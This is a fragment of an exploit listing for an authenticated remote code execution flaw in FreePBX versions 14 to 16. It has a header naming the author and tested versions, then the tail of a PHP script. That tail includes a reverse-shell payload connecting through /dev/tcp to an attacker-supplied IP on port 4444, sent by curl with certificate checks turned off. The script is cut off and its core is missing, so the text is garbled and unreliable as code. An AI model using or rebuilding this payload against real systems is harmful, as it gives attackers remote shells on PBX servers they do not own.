FreePBX 16 Remote Code Execution
# Exploit Title: FreePBX 16 – Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Cold z3ro
# Date: 6/1/2024
# Tested on: 14,15,16
# Vendor: https://www.freepbx.org/
%26 /dev/tcp/'.$backconnectip.'/4444 0>%261)');
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
echo $response = curl_exec($ch)."\n";
curl_close($ch);
?>